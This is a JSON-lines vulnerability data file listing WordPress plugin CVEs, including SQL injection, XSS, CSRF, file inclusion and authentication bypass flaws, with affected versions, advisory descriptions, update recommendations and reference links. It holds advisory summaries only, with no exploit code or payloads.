{"CVE_ID":"CVE-2023-5336","slug":"ipanorama-360-virtual-tour-builder-lite","versionImpact":"1.8.0","versionEndExcluding":"1.8.1","description":"The iPanorama 360 \u2013 WordPress Virtual Tour Builder plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 1.8.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with contributor-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2980553\\\/ipanorama-360-virtual-tour-builder-lite#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2980553\\\/ipanorama-360-virtual-tour-builder-lite#file1\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ipanorama-360-virtual-tour-builder-lite\\\/tags\\\/1.8.0\\\/includes\\\/plugin.php#L439\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ipanorama-360-virtual-tour-builder-lite\\\/tags\\\/1.8.0\\\/includes\\\/plugin.php#L439\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3566b602-c991-488f-9de2-57236c4735b5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3566b602-c991-488f-9de2-57236c4735b5?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12859","slug":"boombox-theme-extensions","versionImpact":"1.8.0","versionEndExcluding":"1.8.1","description":"The BoomBox Theme Extensions plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.8.0 via the 'boombox_listing' shortcode 'type' attribute. This makes it possible for authenticated attackers, with contributor-level and above permissions, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where php file type can be uploaded and included.","recommendation":"Update to version 1.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/documentation.px-lab.com\\\/boombox\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/documentation.px-lab.com\\\/boombox\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3a647b6-ed9e-402d-9424-2937f7aa8960?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3a647b6-ed9e-402d-9424-2937f7aa8960?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6070","slug":"if-so","versionImpact":"1.8.0.3","versionEndExcluding":"1.8.0.4","description":"The If-So Dynamic Content Personalization WordPress plugin before 1.8.0.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 1.8.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/97bab6cf-011c-4df4-976c-1f3252082f8f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/97bab6cf-011c-4df4-976c-1f3252082f8f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5713","slug":"if-so","versionImpact":"1.8.0.3","versionEndExcluding":"1.8.0.4","description":"The If-So Dynamic Content Personalization WordPress plugin before 1.8.0.4 does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute, which could lead to Reflected Cross-Site Scripting in old web browsers","recommendation":"Update to version 1.8.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eb3f24a7-3171-42c3-9016-e29da4f384fa\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eb3f24a7-3171-42c3-9016-e29da4f384fa\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5440","slug":"if-so","versionImpact":"1.8.0.2","versionEndExcluding":"1.8.0.3","description":"The If-So Dynamic Content Personalization WordPress plugin before 1.8.0.3 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 1.8.0.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/52fdc271-96f2-4e25-9df2-29a3ce06328c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/52fdc271-96f2-4e25-9df2-29a3ce06328c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2019-25216","slug":"rich-reviews","versionImpact":"1.7.4","versionEndExcluding":"1.8.0","description":"The Rich Review plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the POST body 'update' parameter in versions up to, and including, 1.7.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.8.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db701ad3-10fd-4a40-b239-139fbc95ab61?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db701ad3-10fd-4a40-b239-139fbc95ab61?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2019\\\/09\\\/rich-reviews-plugin-vulnerability-exploited-in-the-wild\\\/\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2019\\\/09\\\/rich-reviews-plugin-vulnerability-exploited-in-the-wild\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/support\\\/topic\\\/plugin-not-supported-open-to-malware-uninstall-now\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/support\\\/topic\\\/plugin-not-supported-open-to-malware-uninstall-now\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/81bdc004-9b9c-49e2-b337-35a6d8395c5d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/81bdc004-9b9c-49e2-b337-35a6d8395c5d\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5124","slug":"pagelayer","versionEndExcluding":"1.8.0","description":"The Page Builder: Pagelayer WordPress plugin before 1.8.0 doesn't prevent attackers with administrator privileges from inserting malicious JavaScript inside a post's header or footer code, even when unfiltered_html is disallowed, such as in multi-site WordPress configurations.","recommendation":"Update to version 1.8.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1ef86546-3467-432c-a863-1ca3e5c65bd4\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1ef86546-3467-432c-a863-1ca3e5c65bd4\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-39682","slug":"cooked-pro","versionImpact":"1.7.15.4","versionEndExcluding":"1.8.0","description":"Cooked is a recipe plugin for WordPress. The Cooked plugin for WordPress is vulnerable to HTML Injection in versions up to, and including, 1.7.15.4 due to insufficient input sanitization and output escaping. This vulnerability allows authenticated attackers with contributor-level access and above to inject arbitrary HTML in pages that will be shown whenever a user accesses a compromised page. This issue has been addressed in release version 1.8.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.","recommendation":"Update to version 1.8.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/XjSv\\\/Cooked\\\/security\\\/advisories\\\/GHSA-fx69-f77x-84gr\",\"name\":\"https:\\\/\\\/github.com\\\/XjSv\\\/Cooked\\\/security\\\/advisories\\\/GHSA-fx69-f77x-84gr\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-39681","slug":"cooked-pro","versionImpact":"1.7.15.4","versionEndExcluding":"1.8.0","description":"Cooked is a recipe plugin for WordPress. The Cooked plugin for WordPress is vulnerable to Cross-Site Request Forgery (CSRF) in versions up to, and including, 1.7.15.4 due to missing or incorrect nonce validation on the AJAX action handler. This vulnerability could allow an attacker to trick users into performing an action they didn't intend to perform under their current authentication. This issue has been addressed in release version 1.8.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.","recommendation":"Update to version 1.8.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/XjSv\\\/Cooked\\\/security\\\/advisories\\\/GHSA-q7p9-2x5h-vxm7\",\"name\":\"https:\\\/\\\/github.com\\\/XjSv\\\/Cooked\\\/security\\\/advisories\\\/GHSA-q7p9-2x5h-vxm7\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-39680","slug":"cooked-pro","versionImpact":"1.7.15.4","versionEndExcluding":"1.8.0","description":"Cooked is a recipe plugin for WordPress. The Cooked plugin for WordPress is vulnerable to Cross-Site Request Forgery (CSRF) in versions up to, and including, 1.7.15.4 due to missing or incorrect nonce validation on the AJAX action handler. This vulnerability could allow an attacker to trick users into performing an action they didn't intend to perform under their current authentication. This issue has been addressed in release version 1.8.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.","recommendation":"Update to version 1.8.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/XjSv\\\/Cooked\\\/security\\\/advisories\\\/GHSA-f2mc-hcp9-6xgr\",\"name\":\"https:\\\/\\\/github.com\\\/XjSv\\\/Cooked\\\/security\\\/advisories\\\/GHSA-f2mc-hcp9-6xgr\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-39679","slug":"cooked-pro","versionImpact":"1.7.15.4","versionEndExcluding":"1.8.0","description":"Cooked is a recipe plugin for WordPress. The Cooked plugin for WordPress is vulnerable to Cross-Site Request Forgery (CSRF) in versions up to, and including, 1.7.15.4 due to missing or incorrect nonce validation on the AJAX action handler. This vulnerability could allow an attacker to trick users into performing an action they didn't intend to perform under their current authentication. This issue has been addressed in release version 1.8.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.","recommendation":"Update to version 1.8.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/XjSv\\\/Cooked\\\/security\\\/advisories\\\/GHSA-2jh3-9939-c4rc\",\"name\":\"https:\\\/\\\/github.com\\\/XjSv\\\/Cooked\\\/security\\\/advisories\\\/GHSA-2jh3-9939-c4rc\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-39678","slug":"cooked-pro","versionImpact":"1.7.15.4","versionEndExcluding":"1.8.0","description":"Cooked is a recipe plugin for WordPress. The Cooked plugin is vulnerable to Cross-Site Request Forgery (CSRF) in versions up to, and including, 1.7.15.4 due to missing or incorrect nonce validation on the AJAX action handler. This vulnerability could allow an attacker to trick users into performing an action they didn't intend to perform under their current authentication. This issue has been addressed in release version 1.8.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.","recommendation":"Update to version 1.8.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/XjSv\\\/Cooked\\\/security\\\/advisories\\\/GHSA-pp3h-ghxf-r9pc\",\"name\":\"https:\\\/\\\/github.com\\\/XjSv\\\/Cooked\\\/security\\\/advisories\\\/GHSA-pp3h-ghxf-r9pc\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-37308","slug":"cooked","versionImpact":"1.7.15.4","versionEndExcluding":"1.8.0","description":"The Cooked Pro recipe plugin for WordPress is vulnerable to Persistent Cross-Site Scripting (XSS) via the `_recipe_settings[post_title]` parameter in versions up to, and including, 1.7.15.4 due to insufficient input sanitization and output escaping. This vulnerability allows authenticated attackers with contributor-level access and above to inject arbitrary web scripts in pages that will execute whenever a user accesses a compromised page. A patch is available at commit 8cf88f334ccbf11134080bbb655c66f1cfe77026 and will be part of version 1.8.0.","recommendation":"Update to version 1.8.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/XjSv\\\/Cooked\\\/security\\\/advisories\\\/GHSA-9vfv-c966-jwrv\",\"name\":\"https:\\\/\\\/github.com\\\/XjSv\\\/Cooked\\\/security\\\/advisories\\\/GHSA-9vfv-c966-jwrv\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/XjSv\\\/Cooked\\\/commit\\\/8cf88f334ccbf11134080bbb655c66f1cfe77026\",\"name\":\"https:\\\/\\\/github.com\\\/XjSv\\\/Cooked\\\/commit\\\/8cf88f334ccbf11134080bbb655c66f1cfe77026\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5774","slug":"animated-counters","versionImpact":"1.7","versionEndExcluding":"1.8","description":"The Animated Counters plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/drive.google.com\\\/file\\\/d\\\/1zXWW545ktCznO36k90AN0APhTz8ky-gG\\\/view?usp=sharing\",\"name\":\"https:\\\/\\\/drive.google.com\\\/file\\\/d\\\/1zXWW545ktCznO36k90AN0APhTz8ky-gG\\\/view?usp=sharing\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33c2756d-c300-479f-b3aa-8f22c3a70278?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33c2756d-c300-479f-b3aa-8f22c3a70278?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2984228\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2984228\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4827","slug":"filester","versionImpact":"1.7.6","versionEndExcluding":"1.8","description":"The File Manager Pro WordPress plugin before 1.8 does not properly check the CSRF nonce in the `fs_connector` AJAX action. This allows attackers to make highly privileged users perform unwanted file system actions via CSRF attacks by using GET requests, such as uploading a web shell.","recommendation":"Update to version 1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d4daf0e1-8018-448a-964c-427a355e005f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d4daf0e1-8018-448a-964c-427a355e005f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13733","slug":"skt-blocks","versionImpact":"1.7","versionEndExcluding":"1.8","description":"The SKT Blocks \u2013 Gutenberg based Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's skt-blocks\/post-carousel block in all versions up to, and including, 1.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/skt-blocks\\\/trunk\\\/src\\\/blocks\\\/post-carousel\\\/index.php#L751\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/skt-blocks\\\/trunk\\\/src\\\/blocks\\\/post-carousel\\\/index.php#L751\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3233980\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3233980\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/skt-blocks\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/skt-blocks\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5a84999-bd1b-4b86-9fa1-09c20b50ce37?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5a84999-bd1b-4b86-9fa1-09c20b50ce37?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11293","slug":"pie-register-social-site","versionImpact":"1.7.9","versionEndExcluding":"1.8","description":"The  Registration Forms \u2013 User Registration Forms, Invitation-Based Registrations, Front-end User Profile, Login Form & Content Restriction Social Sites Login plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 1.7.9. This is due to insufficient verification on the user being returned by the social login token. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email and the user does not have an already-existing account for the service returning the token.","recommendation":"Update to version 1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/pieregister.com\\\/\",\"name\":\"https:\\\/\\\/pieregister.com\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/466ff226-a47e-46f1-a46c-6260208ffd42?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/466ff226-a47e-46f1-a46c-6260208ffd42?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6978","slug":"wp-job-manager-companies","versionImpact":"1.7","versionEndExcluding":"1.8","description":"The WP Job Manager \u2013 Company Profiles plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'company' parameter in all versions up to, and including, 1.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3198763%40wp-job-manager-companies&new=3198763%40wp-job-manager-companies&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3198763%40wp-job-manager-companies&new=3198763%40wp-job-manager-companies&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c8edba5b-9bce-4a93-86a6-bb6dcb30fa60?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c8edba5b-9bce-4a93-86a6-bb6dcb30fa60?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11752","slug":"eveeno","versionImpact":"1.7","versionEndExcluding":"1.8","description":"The Eveeno plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'eveeno' shortcode in all versions up to, and including, 1.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eveeno\\\/trunk\\\/eveeno.php#L150\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eveeno\\\/trunk\\\/eveeno.php#L150\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3202716%40eveeno&new=3202716%40eveeno&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3202716%40eveeno&new=3202716%40eveeno&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e254f0ba-9008-44e9-bf8f-31c9614d6f64?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e254f0ba-9008-44e9-bf8f-31c9614d6f64?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11294","slug":"memberful-wp","versionImpact":"1.73.9","versionEndExcluding":"1.74.0","description":"The Memberful plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.73.9 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as site members.","recommendation":"Update to version 1.74.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3204895\\\/memberful-wp\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3204895\\\/memberful-wp\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/19ad787d-e027-48f5-8b5f-9263338b4fc3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/19ad787d-e027-48f5-8b5f-9263338b4fc3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9242","slug":"memberful-wp","versionImpact":"1.73.7","versionEndExcluding":"1.73.8","description":"The Memberful \u2013 Membership Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'memberful_buy_subscription_link' and 'memberful_podcasts_link' shortcodes in all versions up to, and including, 1.73.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.73.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9e30377-2b5a-4b2d-9f19-bae91608fb24?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9e30377-2b5a-4b2d-9f19-bae91608fb24?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/memberful-wp\\\/tags\\\/1.73.7\\\/src\\\/shortcodes.php#L25\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/memberful-wp\\\/tags\\\/1.73.7\\\/src\\\/shortcodes.php#L25\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/memberful-wp\\\/tags\\\/1.73.7\\\/src\\\/shortcodes.php#L59\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/memberful-wp\\\/tags\\\/1.73.7\\\/src\\\/shortcodes.php#L59\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3161020%40memberful-wp&new=3161020%40memberful-wp&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3161020%40memberful-wp&new=3161020%40memberful-wp&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5605","slug":"url-shortify","versionImpact":"1.7.9","versionEndExcluding":"1.7.9.1","description":"The URL Shortify WordPress plugin through 1.7.8 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 1.7.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9ec03ef0-0c04-4517-b761-df87af722a64\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9ec03ef0-0c04-4517-b761-df87af722a64\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1445","slug":"page-scroll-to-id","versionImpact":"1.7.8","versionEndExcluding":"1.7.9","description":"The Page scroll to id plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.7.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.7.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c0d5f034-fd8b-456a-b44a-7d82db3a16a0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c0d5f034-fd8b-456a-b44a-7d82db3a16a0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-scroll-to-id\\\/tags\\\/1.7.8\\\/includes\\\/malihu-pagescroll2id-shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-scroll-to-id\\\/tags\\\/1.7.8\\\/includes\\\/malihu-pagescroll2id-shortcodes.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-scroll-to-id\\\/tags\\\/1.7.8\\\/includes\\\/malihu-pagescroll2id-shortcodes-php52.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-scroll-to-id\\\/tags\\\/1.7.8\\\/includes\\\/malihu-pagescroll2id-shortcodes-php52.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3035333%40page-scroll-to-id%2Ftrunk&old=3034857%40page-scroll-to-id%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3035333%40page-scroll-to-id%2Ftrunk&old=3034857%40page-scroll-to-id%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2296","slug":"loginizer","versionEndExcluding":"1.7.9","description":"The Loginizer WordPress plugin before 1.7.9 does not escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8126ff73-c0e5-4c1b-ba10-2e51f690521e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8126ff73-c0e5-4c1b-ba10-2e51f690521e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0271","slug":"wp-font-awesome","versionEndExcluding":"1.7.9","description":"The WP Font Awesome WordPress plugin before 1.7.9 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fd7aaf06-4be7-48d6-83a1-cd5cd6c3d9c2\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fd7aaf06-4be7-48d6-83a1-cd5cd6c3d9c2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5087","slug":"pagelayer","versionImpact":"1.7.7","versionEndExcluding":"1.7.8","description":"The Page Builder: Pagelayer WordPress plugin before 1.7.8 doesn't prevent attackers with author privileges and higher from inserting malicious JavaScript inside a post's header or footer code.","recommendation":"Update to version 1.7.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3b45cc0b-7378-49f3-900e-d0e18cd4b878\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3b45cc0b-7378-49f3-900e-d0e18cd4b878\",\"refsource\":\"MISC\",\"tags\":[]}]"}
